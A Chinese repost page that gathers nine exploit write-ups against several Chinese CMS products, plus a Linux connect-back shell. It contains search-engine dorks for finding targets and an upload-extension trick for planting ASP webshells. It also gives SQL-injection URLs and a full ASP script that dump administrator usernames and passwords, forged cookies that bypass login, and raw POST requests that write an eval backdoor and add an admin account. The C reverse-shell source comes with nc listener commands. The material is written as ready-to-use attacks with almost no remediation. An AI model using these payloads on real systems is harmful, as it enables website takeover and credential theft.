蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警

| 收藏本文 下载本文 作者:hhhhhush

下面是小编为大家整理的蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警(共含9篇),欢迎阅读与收藏。同时,但愿您也能像本文投稿人“hhhhhush”一样,积极向本站投稿分享好文章。

蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警

篇1:蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警

蓝方互联建站程序是基于《科讯CMS V7.0》的定制程序,官方售价160RMB

虽然是基于《科讯CMS V7.0》但是不能用科讯7.0的后台拿shell方法,管理帐号密码可以用科讯的方法来获取,蓝方互联精简后不能添加自定义页面等,但可以导出标签,并能自定义导出的名称,没有过滤后缀,亮点就是随便添加个标签,html代码里写入了一句话,导出tnt.asp ,抄菜刀,连接,搞定!

篇2:科讯CMS网站系统 0day发布漏洞预警

关键字:Powered By KesionCMS V5.5 inurl:User/UserReg.asp

步骤一: 访问/user/userreg.asp 注册用户

步骤二: 访问/KS_editor/selectupfiles.asp ,勾选自动命名选项,上传命名如X.asp;X.jpg文件,

步骤三: 访问上传文件 路径 xm.asp;xm.jpg

/Upfiles/User/用户名/xm.asp;xm.jpg

篇3:风讯CMS 0DAY exploits漏洞预警

关键字: inurl:User/Reg_service.asp

风讯的注册页面...

漏洞页面:/user/SetNextOptions.asp

利用方法:

构造注入

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name”管理用户名数据库表

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word”管理密码数据库表

把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了

DE>foosun cms 0day exploits<%web=request(“web”)id=request(“id”)%>关键字:会员注册step 1 of 4 step

输入地址:<%=web%>“>

要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员

<% function bin2str(bin)    dim tmp,ustr    tmp=“”    for i=1 to LenB(bin)-1      ustr=AscB(MidB(bin,i,1))      if ustr>127 then        i=i+1        tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))      else        tmp=tmp&chr(ustr)      end if    next    bin2str=tmp  end functionwebuser=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idwebpass=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idif web=“” thenelseset x=server.createObject(“Microsoft.XMLHTTP”)  x.open “get”,webuser,false  x.send  str=bin2str(x.responseBody)response.write “你暴的网站地址:”&web&“

第”&id&“位的管理员

”response.write “

网站后台地址

”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “

------------------

帐号:”&mid1&“

”x.open “get”,webpass,false  x.send  str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “

密码:”&mid2&“

------------------

” response.write “

爆出咯,可以YY了

cmd5”  set x=nothingend if%>DE>

具体的利用方法请参考源码,

风讯CMS 0DAY exploits漏洞预警

篇4:帝国cms 7.0 后台拿shell漏洞预警

帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码,

进入后台~!

方法一:系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:

“导入系统模型”,可进入“LoadInM.php”页面,如图:

在本地新建一个文件,文本内容为

再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,

可以从导入系统模型源文件中查看到,如图:

方法二:

在本地新建一个info.php(任意php文件)其源码内容为

再重名名为info.php.mod,将此文件按照方法一导入系统模型

即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:

info.php.mod的源码

然后

系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码:

即可在网站根目录生成 z.php 菜刀连接即可~!

篇5:骑士cms注入及后台拿shell漏洞预警

0x1 任意用户登录

0x2 盲注

0x3 后台拿shell

0x4 随机函数问题

详细说明:

0x1 任意用户登录

user/login.php

elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])

{

if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))

{

update_user_info($_COOKIE['QS']['uid'],false,false);

header(“Location:”.get_member_url($_SESSION['utype']));

}

else

{

unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION[“openid”]);

setcookie(“QS[uid]”,“”,time - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[username]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[password]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie(“QS[utype]”,“”,time() - 3600,$QS_cookiepath, $QS_cookiedomain);

header(“Location:”.url_rewrite('QS_login'));

}

}

include/fun_user.php

//检测COOKIE

function check_cookie($name,$pwd){

global $db;

$row = $db->getone(“SELECT COUNT(*) AS num FROM ”.table('members').“ WHERE username='{$name}' and password = '{$pwd}'”);

if($row['num'] > 0)

{

return true;

}else{

return false;

}

}

构造cookie如下

QS[uid] 2

QS[utype]   1

QS[password]   111111111111111111111

QS[username]%bf%27 or 1=1 %23

uid 为假冒用户的ID utype为用户类型password任意

0x2 盲注

demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23

上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面

0x3 后台拿shell

1.先关闭csrf防御功能

2.在hr工具箱中添加一个伪造的doc,内容为

3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools//06/1339941553308.doc

4.然后执行

0x4 随机函数问题(几乎可以无视,纯属个人YY)

在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了,

骑士cms注入及后台拿shell漏洞预警

这个$QS_pwdhash是由randstr生成

function randstr($length=6)

{

$hash='';

$chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';

$max=strlen($chars)-1;

mt_srand((double)microtime()*1000000);

for($i=0;$i<$length;$i++) {

$hash.=$chars[mt_rand(0,$max)];

}

return $hash;

}

生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了( )

漏洞证明:

修复方案:

do it yourself~

作者yy520

篇6:动力互联建站漏洞漏洞预警

简要描述:

UNCC动力互联建站存在多种高危漏洞,基本通杀所有程序,

(这次报个礼包求邀请码)

详细说明:

后台入口:

/manage/login.aspx

伪造cookie即可绕过登陆

[{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminID”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “1”},{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminName”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “admin”}]

爆管理员账户密码:

/manage/admins.aspx

任意文件下载/删除:

期刊下载-添加下载文档 (删除此条目会同时删掉所指向文件)​

SQL注入:

/manage/EditAdmin.aspx?ID=1'

/manage/EditAdmin.aspx?ID=1 and 1=1

漏洞证明:

修复方案:

过滤,验证

篇7:餐厅cms getshell漏洞漏洞预警

漏洞类型:代码执行

关键字:inurl:index.php?m=shopcar

问题出在/install/index.php文件,在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。

可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。

1、getshell(很危险)

if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(“step”,1);$smarty->display(“index.html”);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=“';file_put_contents(“../config/config.inc.php”,$str);//将提交的数据写入php文件

上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马

-----------post----------

POST /canting/install/index.php?m=index&step=2 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 126

mysql_host=test“);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

---------post----------

但是这个方法很危险,将导致网站无法运行,

2、直接添加管理员

elseif($_REQUEST['step']==5){if($_POST){ require_once(”../config/config.inc.php“);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(”SET NAMES “.MYSQL_CHARSET );mysql_query(”SET sql_mode=''“);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo ”“;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo ”“;//这里也是没有退出}mysql_query(”insert into “.TABLE_PRE.”admin(adminname,password,isfounder) values('$adminname','“.umd5($pwd1).”',1)“);//直接可以插入一个管理员}

这样的话我们就可以直接插入一个管理员帐号,语句如下:

POST /canting/install/index.php?m=index&step=5 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen

篇8:linux 反弹shell漏洞预警

#include

#include

#include

#include

#include

#include

#include

void usage();

char shell[]=”/bin/sh“;

char message[]=”s8s8 welcomen“;

int sock;

int main(int argc, char *argv[]) {

if(argc <3){

usage(argv[0]);

}

struct sockaddr_in server;

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

printf(”Couldn't make socket!n“); exit(-1);

}

server.sin_family = AF_INET;

server.sin_port = htons(atoi(argv[2]));

server.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {

printf(”Could not connect to remote shell!n“);

exit(-1);

}

send(sock, message, sizeof(message), 0);

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

execl(shell,”/bin/sh“,(char *)0);

close(sock);

return 1;

}

void usage(char *prog[]) {

printf(”tts8s8 connect back doornn“);

printf(”t sql@s8s8.netnn“);

printf(”Usage: %s

n", prog);

exit(-1);

}

gcc -o f f.c

再在本机上监听一个端口

nc -l -p 8888

再执行./f 192.168.1.14 8888

注:反弹回来的 shell没提示符,

linux 反弹shell漏洞预警

篇9:科讯执行漏洞发布

原创:sobiny[bct]

组织:Bug.Center.Team

首发:sobiny.cn

科讯CMS这个程序里面,Execute函数出现了大概三个地方耶。。

不过其中有一个地方过滤不严,

其Execute函数内的参数可以任意构造。导致执行漏洞。。

凭回忆描述一下:

是HTTP头的IP地址的问题,入库了后。

然后取出来后,就直接放到Execute函数里面了。

这个漏洞可比一般的注入和上传要来得严重得多,啊哈哈。。

我实在没时间去写详细利用过程。

呼叫whytt写EXP。。

Artiphp CMS 5.5.0数据库备份泄露Exploit漏洞预警

iShowMusic V1.2 写入shell漏洞

FCKeditor漏洞利用总结漏洞预警

PHP 5.2.11/5.3.0 的多个漏洞漏洞预警

关于MS08067的一点细节漏洞预警

dedecms 5.7 edit.inc.php文件注射漏洞预警

shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警

Thaiweb远程文件sql注入漏洞0day漏洞预警

火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

eWebeditoR3.8 for php任意文件上传EXP漏洞预警

蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警(共9篇)

欢迎下载DOC格式的蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

猜你喜欢

NEW
点击下载本文文档